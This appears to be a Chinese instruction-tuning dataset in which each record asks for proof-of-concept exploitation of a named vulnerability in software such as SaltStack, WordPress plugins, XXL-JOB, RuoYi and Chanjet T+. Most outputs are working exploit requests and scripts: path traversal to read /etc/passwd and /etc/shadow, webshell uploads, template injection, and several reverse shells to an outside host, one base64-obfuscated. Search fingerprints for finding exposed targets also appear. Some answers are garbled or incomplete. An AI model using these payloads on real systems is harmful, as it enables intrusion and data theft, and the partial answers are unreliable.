  565. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Saltstack 未授权RCE漏洞 CVE-2021-25281~25283\n漏洞描述:SaltStack套件是政企机构 IT运维管理人员常用的管理工具,利用这些漏洞,最严重情形可导致未授权远程代码执行。 - CVE-2021-25281:salt-api wheel_async未授权访问 - CVE-2021-25283:sdb rest插件模版渲染问题 - CVE-2021-25282:wheel/pillar_roots.py文件任意写漏洞 ( 参考链接: - https://mp.weixin.qq.com/s/iu4cS_DZTs0sVVg92RBe4Q - https://mp.weixin.qq.com/s/QvQoTuQJVthxS07pbLWJmg - https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/ - https://dozer.nz/posts/saltapi-vulns - https://github.com/Immersive-Labs-Sec/CVE-2021-25281\n影响版本:``` Saltstack 3002.2之前的所有版本 SaltStack =< 3002.2 SaltStack =< 3001.4 SaltStack =< 3000.6 ```\n网络测绘:``` app=\"SALTSTACK-产品\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-25281\n【POC利用方法】\n1. Saltstack 3002.2之前的所有版本\nSaltStack =< 3002.2\nSaltStack =< 3001.4\nSaltStack =< 3000.6\n2. app=\"SALTSTACK-产品\"\n3. http://target/run\nPOST:\n\"client\": \"wheel_async\",\n\"fun\": \"pillar_roots.write\",\n\"data\": \"../../../../../tmp/test2\",\n\"path\": \"../../../../../tmp/test2\",\n\"username\": \"password\",\n\"password\": \"username\",\n\"eauth\": \"pam\"\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Saltstack 未授权RCE漏洞 CVE-2021-25281~25283.md"}
    566. 

  566. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Elasticsearch 未授权访问\n漏洞描述:Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在未授权访问漏洞时,可被非法操作数据\n影响版本:``` Elasticsearch ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. Elasticsearch\n2. http://localhost:9200/_cat/indices\nhttp://localhost:9200/_river/_search //查看数据库敏感信息\nhttp://localhost:9200/_nodes         //查看节点数据\nhttp://localhost:9200/_plugin/head/  //web管理界面(head插件)\n3. 访问目标URL : http://xxx.xxx.xxx.xxx:9200/_node\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Elasticsearch 未授权访问.md"}
    567. 

  567. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738\n漏洞描述:WordPress Duplicator插件由于对文件下载没有进行验证,则导致了任意文件读取漏洞\n影响版本:``` Duplicator <= v1.3.26 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-11738\n【POC利用方法】\n1. Duplicator <= v1.3.26\n2. public static function duplicator_download() {\n        $file = sanitize_text_field($_GET['file']);\n        $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;\n        // Process download\n        if(file_exists($filepath)) {\n            // Clean output buffer\n            if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {\n                @ob_clean();\n            }\n\n            header('Content-Description: File Transfer');\n            header('Content-Type: application/octet-stream');\n            header('Content-Disposition: attachment; filename=\"'.basename($filepath).'\"');\n            header('Expires: 0');\n            header('Cache-Control: must-revalidate');\n            header('Pragma: public');\n            header('Content-Length: ' . filesize($filepath));\n            flush(); // Flush system output buffer\n\n            try {\n                $fp = @fopen($filepath, 'r');\n                if (false === $fp) {\n                    throw new Exception('Fail to open the file '.$filepath);\n                }\n                while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {\n                    echo $data;\n                }\n                @fclose($fp);\n            } catch (Exception $e) {\n                readfile($filepath);\n            }\n            exit;\n        } else {\n            wp_die('Invalid installer file name!!');\n        }\n    }\n3. /wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738.md"}
    568. 

  568. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SaltStack Minion 命令注入漏洞 CVE-2021-31607\n漏洞描述:2021年4月28日,深信服安全团队监测到一则Salt组件存在 SaltStack Minion 命令注入漏洞的信息,漏洞编号:CVE-2021-31607,漏洞威胁等级:中危。 该漏洞是由于在SaltStack Salt 2016.9至3002.6中,快照程序模块中存在一个命令注入漏洞,攻击者可利用该漏洞获得权限的情况下,对一个分支系统的本地特权进行升级。 参考阅读: * https://sec.stealthcopter.com/saltstack-snapper-minion-privledge-escaltion/ * https://nvd.nist.gov/vuln/detail/CVE-2021-31607 * https://nox.qianxin.com/vulnerability/detail/97347\n影响版本:``` 2016.9 ≤ SaltStack Salt ≤ 3002.6 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-31607\n【POC利用方法】\n1. 2016.9 ≤ SaltStack Salt ≤ 3002.6\n2. echo hi > '$(touch HACKED).txt'\n反弹shell:\necho hi > '$(echo bmMgLWUgL2Jpbi9iYXNoIDEyNy4wLjAuMSA0NDQ0|base64 -d|sh -i).txt'\n3. * https://nox.qianxin.com/vulnerability/detail/97347\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/SaltStack Minion 命令注入漏洞 CVE-2021-31607.md"}
    569. 

  569. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Saltstack 远程命令执行漏洞 CVE-2020-11651 11652\n漏洞描述:SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。 在 CVE-2020-11652 目录遍历漏洞中,攻击者通过构造恶意请求,可以读取、写入服务器上任意文件。\n影响版本:``` SaltStack Version < 2019.2.4 SaltStack Version < 3000.2 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-11651\n【POC利用方法】\n1. SaltStack Version < 2019.2.4\nSaltStack Version < 3000.2\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/saltstack/CVE-2020-11652\ndocker-compose up -d\n3. auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)\nauth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Saltstack 远程命令执行漏洞 CVE-2020-11651 11652.md"}
    570. 

  570. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973\n漏洞描述:VMware vCenter Server 插件中对用户提供的输入验证不当,未经过身份验证的远程攻击者可以发送特制的 HTTP 请求,欺骗应用程序向任意系统发起请求。 参考链接: * https://kb.vmware.com/s/article/82374 * https://twitter.com/osama_hroot/status/1365586206982082560\n影响版本:``` vCenter Server: 6.5, 6.5 U1, 6.5 U3, 6.5.0, 6.5.0a, 6.5.0b, 6.5.0c, 6.5.0d, 6.5u2c, 6.7, 6.7 U3, 6.7.0, 6.7.0d, 6.7u3f, 7.0 Cloud Foundation: before 3.10.1.2, 4.2 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-21973\n【POC利用方法】\n1. vCenter Server: 6.5, 6.5 U1, 6.5 U3, 6.5.0, 6.5.0a, 6.5.0b, 6.5.0c, 6.5.0d, 6.5u2c, 6.7, 6.7 U3, 6.7.0, 6.7.0d, 6.7u3f, 7.0\nCloud Foundation: before 3.10.1.2, 4.2\n2. GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHOST:\nvcIP: SSRF\nvcUsername:sa\nvaPassword:sa\nreqResource:sa\n...\n3. * https://twitter.com/osama_hroot/status/1365586206982082560\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md"}
    571. 

  571. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress File Manager<6.9 RCE CVE-2020-25213\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-25213\n【POC利用方法】\n1. curl -ks --max-time 5 -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\"  -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n2. POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nContent-Length: 631\nContent-Type: multipart/form-data; boundary=------------------------9689147a5989a801\nConnection: close\n\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"1.php\"\nContent-Type: application/octet-stream\n\n<?php phpinfo();?>\n\n--------------------------9689147a5989a801--\n3. Content-Disposition: form-data; name=\"target\"\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md"}
    572. 

  572. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:XXL-JOB executor 未授权访问漏洞\n漏洞描述:XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。 参考链接: - https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g - https://landgrey.me/blog/18/ - https://github.com/OneSourceCat/XxlJob-Hessian-RCE\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. POST /run HTTP/1.1\nHost: your-ip:9999\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\nConnection: close\nContent-Type: application/json\nContent-Length: 365\n\n{\n  \"jobId\": 1,\n  \"executorHandler\": \"demoJobHandler\",\n  \"executorParams\": \"demoJobHandler\",\n  \"executorBlockStrategy\": \"COVER_EARLY\",\n  \"executorTimeout\": 0,\n  \"logId\": 1,\n  \"logDateTime\": 1586629003729,\n  \"glueType\": \"GLUE_SHELL\",\n  \"glueSource\": \"touch /tmp/awesome_poc\",\n  \"glueUpdatetime\": 1586699003758,\n  \"broadcastIndex\": 0,\n  \"broadcastTotal\": 0\n}\n3. \"glueSource\": \"bash -i >& /dev/tcp/192.168.174.128/2333 0>&1 \"\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/XXL-JOB executor 未授权访问漏洞.md"}
    573. 

  573. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:若依管理系统 后台任意文件读取 CNVD-2021-01931\n漏洞描述:若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件\n影响版本:``` RuoYi < v4.5.1 ```\n网络测绘:``` app=\"若依-管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. RuoYi < v4.5.1\n2. app=\"若依-管理系统\"\n3. import requests\nimport sys\nimport random\nimport re\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号 : PeiQi文库                                                     \\033[0m')\n    print('+  \\033[34mVersion: RuoYi < v4.5.1                                            \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+  \\033[36mCookie      >>> JSESSIONID=xxxxxx                                   \\033[0m')\n    print('+  \\033[36mFile        >>> /etc/passwd                                         \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url, Cookie):\n    vuln_url = target_url + \"/common/download/resource?resource=/profile/../../../../etc/passwd\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n        \"Cookie\":Cookie\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        print(\"\\033[32m[o] 正在请求 {}//common/download/resource?resource=/profile/../../../../etc/passwd \\033[0m\".format(target_url))\n        if \"root\" in response.text and response.status_code == 200:\n            print(\"\\033[32m[o] 目标 {}存在漏洞 ,成功读取 /etc/passwd \\033[0m\".format(target_url))\n            print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(response.text))\n            while True:\n                Filename = input(\"\\033[35mFile >>> \\033[0m\")\n                if Filename == \"exit\":\n                    sys.exit(0)\n                else:\n                    POC_2(target_url, Cookie, Filename)\n        else:\n            print(\"\\033[31m[x] 请求失败 \\033[0m\")\n            sys.exit(0)\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\ndef POC_2(target_url, Cookie, Filename):\n    vuln_url = target_url + \"/common/download/resource?resource=/profile/../../../../{}\".format(Filename)\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n        \"Cookie\":Cookie\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(response.text))\n\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    Cookie = str(input(\"\\033[35mCookie >>> \\033[0m\"))\n    POC_1(target_url, Cookie)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/若依管理系统 后台任意文件读取 CNVD-2021-01931.md"}
    574. 

  574. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Aria2 任意文件写入漏洞\n漏洞描述:Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。 参考阅读:https://paper.seebug.org/120/\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. * * * * * root /usr/bin/perl -e 'use Socket;$i=\"192.168.174.128\";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n3. 参考阅读:https://paper.seebug.org/120/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Aria2 任意文件写入漏洞.md"}
    575. 

  575. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:浪潮ClusterEngineV4.0 sysShell 任意命令执行漏洞\n漏洞描述:浪潮ClusterEngineV4.0 存在远程命令执行,攻击者通过发送特殊的请求可以获取服务器权限\n影响版本:``` 浪潮ClusterEngineV4.0 ```\n网络测绘:``` title=\"TSCEV4.0\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 浪潮ClusterEngineV4.0\n2. title=\"TSCEV4.0\"\n3. POST /sysShell HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: lang=cn\nCache-Control: max-age=0\nContent-Length: 42\n\nop=doPlease&node=cu01&command=cat /etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/浪潮ClusterEngineV4.0 sysShell 任意命令执行漏洞.md"}
    576. 

  576. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Gerapy read 后台任意文件读取漏洞\n漏洞描述:Gerapy gerapy/server/core/views.py 中的 project_file_read 方法存在任意文件读取,攻击者登录后台后发送特定的请求包即可利用漏洞\n影响版本:``` Gerapy <= 0.9.6 ```\n网络测绘:``` title=\"Gerapy\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Gerapy <= 0.9.6\n2. title=\"Gerapy\"\n3. @api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef project_file_read(request):\n    \"\"\"\n    get content of project file\n    :param request: request object\n    :return: file content\n    \"\"\"\n    if request.method == 'POST':\n        data = json.loads(request.body)\n        path = join(data['path'], data['label'])\n        # binary file\n        with open(path, 'rb') as f:\n            return HttpResponse(f.read().decode('utf-8'))\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Gerapy read 后台任意文件读取漏洞.md"}
    577. 

  577. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Grafana plugins 任意文件读取漏洞 CVE-2021-43798\n漏洞描述:Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件\n影响版本:``` Grafana 8.x ```\n网络测绘:``` app=\"Grafana_Labs-公司产品\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-43798\n【POC利用方法】\n1. Grafana 8.x\n2. app=\"Grafana_Labs-公司产品\"\n3. https://codeload.github.com/grafana/grafana/zip/refs/tags/v8.3.0\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Grafana plugins 任意文件读取漏洞 CVE-2021-43798.md"}
    578. 

  578. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113\n漏洞描述:零视技术(上海)有限公司是以领先的视频技术服务于客户,致力于物联网视频开发简单化,依托于HTML5 WebRTC 等新的技术,实现全平台视频播放简单化。 零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞。攻击者可利用漏洞访问后台相应端口,执行未授权操作。\n影响版本:``` 零视科技 H5S视频平台 ```\n网络测绘:``` title=\"H5S视频平台|WEB\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 零视科技 H5S视频平台\n2. title=\"H5S视频平台|WEB\"\n3. /doc/api.html\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113.md"}
    579. 

  579. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JimuReport FreeMarker 服务端模板注入命令执行 CVE-2023-4450\n漏洞描述:积木报表(JimuReport)是一个开源的数据可视化报表平台。在其1.6.0版本及以前,存在一个FreeMarker服务端模板注入(SSTI)漏洞,攻击者利用该漏洞可在服务器中执行任意命令。 参考链接: - [https://github.com/advisories/GHSA-j8h5-8rrr-m6j9](https://github.com/advisories/GHSA-j8h5-8rrr-m6j9) - [https://whoopsunix.com/docs/java/named%20module/](https://whoopsunix.com/docs/java/named%20module/)\n影响版本:``` JimuReport version <= 1.6.0 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-4450\n【POC利用方法】\n1. JimuReport version <= 1.6.0\n2. docker compose up -d\n3. POST /jmreport/queryFieldBySql HTTP/1.1\nHost: localhost:8085\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/json\nContent-Length: 100\n\n{\"sql\":\"select 'result:<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()> ${ex(\\\"id\\\")}'\" }\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/JimuReport FreeMarker 服务端模板注入命令执行 CVE-2023-4450.md"}
    580. 

  580. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JumpServer 未授权接口 远程命令执行漏洞\n漏洞描述:JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。 JumpServer 使用Python / Django 进行开发。2021年1月15日,阿里云应急响应中心监控到开源堡垒机JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器。\n影响版本:``` JumpServer < v2.6.2 JumpServer < v2.5.4 JumpServer < v2.4.5 JumpServer = v1.5.9 ```\n网络测绘:``` app=\"FIT2CLOUD-JumpServer-堡垒机\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. JumpServer < v2.6.2\nJumpServer < v2.5.4\nJumpServer < v2.4.5\nJumpServer = v1.5.9\n2. app=\"FIT2CLOUD-JumpServer-堡垒机\"\n3. cd /opt/jumpserver-installer-v2.6.1\n./jmsctl.sh start\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/JumpServer 未授权接口 远程命令执行漏洞.md"}
    581. 

  581. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:NPS auth_key 未授权访问漏洞\n漏洞描述:NPS auth_key 存在未授权访问漏洞,当 nps.conf 中的 auth_key 未配置时攻击者通过生成特定的请求包可以获取服务器后台权限\n影响版本:``` NPS ```\n网络测绘:``` body=\"serializeArray()\" && body=\"/login/verify\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"serializeArray()\" && body=\"/login/verify\"\n2. md5Key := s.getEscapeString(\"auth_key\")\ntimestamp := s.GetIntNoErr(\"timestamp\")\nconfigKey := beego.AppConfig.String(\"auth_key\")\ntimeNowUnix := time.Now().Unix()\nif !(md5Key != \"\" && (math.Abs(float64(timeNowUnix-int64(timestamp))) <= 20) && (crypt.Md5(configKey+strconv.Itoa(timestamp)) == md5Key)) {\n\tif s.GetSession(\"auth\") != true {\n\t\ts.Redirect(beego.AppConfig.String(\"web_base_url\")+\"/login/index\", 302)\n\t}\n} else {\n\ts.SetSession(\"isAdmin\", true)\n\ts.Data[\"isAdmin\"] = true\n}\n3. import time\nimport hashlib\nnow = time.time()\nm = hashlib.md5()\nm.update(str(int(now)).encode(\"utf8\"))\nauth_key = m.hexdigest()\n\nprint(\"auth_key=%s&timestamp=%s\" % (auth_key,int(now)))\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/NPS auth_key 未授权访问漏洞.md"}
    582. 

  582. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞\n漏洞描述:AVCON6 系统管理平台 org_execl_download.action存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器任意文件\n影响版本:``` AVCON6 系统管理平台 ```\n网络测绘:``` app=\"AVCON-6\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. AVCON6 系统管理平台\n2. app=\"AVCON-6\"\n3. /org_execl_download.action?filename=../../../../../../../../../../../../../etc/shadow\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞.md"}
    583. 

  583. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ShowDoc 前台文件上传漏洞\n漏洞描述:参考链接: - https://github.com/star7th/showdoc/pull/1059\n网络测绘:``` app=\"ShowDoc\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"ShowDoc\"\n2. POST /server/index.php?s=/home/page/uploading HTTP/1.1\n上传图片,并抓包,将文件名改为plzmyy.<>php\n3. import requests\nrequests.packages.urllib3.disable_warnings()\n\ntest = open('url.txt',\"r\")\nfor host in test.readlines():\n    url = host+\"/server/index.php?s=/home/page/uploading\"\n    payload = \"\"\"------WebKitFormBoundary5j2IsrTFPjJCVtwU\n    Content - Disposition: form - data;name = \"editormd-image-file\";filename = \"plzmyy.<>php\"\n    Content - Type: text / plain\n\n    123123test\n    ------WebKitFormBoundary5j2IsrTFPjJCVtwU - -\"\"\"\n    headers = {\n        \"Cookie\": \"PHPSESSID=shp3gipo9moaj58kp9n8sbi4f1; think_language=zh-CN; cookie_token=8ff04b9bba8b6abf30ab5e0be6cceea2192c9cf7a90d73b2d34d025d84feea2d\",\n        \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n        \"Connection\": \"close\",\n        \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\n        \"Sec-Fetch-Site\": \"same-origin\",\n        \"Sec-Fetch-Dest\": \"iframe\",\n        \"Accept-Encoding\": \"gzip, deflate\",\n        \"Sec-Fetch-Mode\": \"navigate\",\n        \"sec-ch-ua\": \"\\\"Google Chrome\\\";v=\\\"87\\\", \\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"87\\\"\",\n        \"sec-ch-ua-mobile\": \"?0\",\n        \"Cache-Control\": \"max-age=0\",\n        \"Upgrade-Insecure-Requests\": \"1\",\n        \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8\",\n        \"Content-Length\": \"212\",\n        \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundary5j2IsrTFPjJCVtwU\"\n    }\n    try:\n        response = requests.request(\"POST\", url, data=payload, headers=headers, verify=False, timeout=5)\n    except:\n        continue\n\n    if response.text in 'success':\n        print(response.text)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ShowDoc 前台文件上传漏洞.md"}
    584. 

  584. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 畅捷通T+ Upload.aspx 任意文件上传漏洞\n漏洞描述:用友 畅捷通T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证进行文件上传,控制服务器\n影响版本:``` 用友 畅捷通T+ ```\n网络测绘:``` app=\"畅捷通-TPlus\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"畅捷通-TPlus\"\n2. POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1\nHost:\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Length: 261\nUser-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; ko-KR) AppleWebKit/535.16.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.16.4\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXR9biLu\nConnection: close\n\n------WebKitFormBoundaryVXR9biLu\nContent-Disposition: form-data; name=\"File1\";filename=\"../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/1.txt\"\nContent-Type: image/jpeg\n\n1\n------WebKitFormBoundaryVXR9biLu--\n3. /tplus/shell.aspx?preload=1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/用友 畅捷通T+ Upload.aspx 任意文件上传漏洞.md"}
    585. 

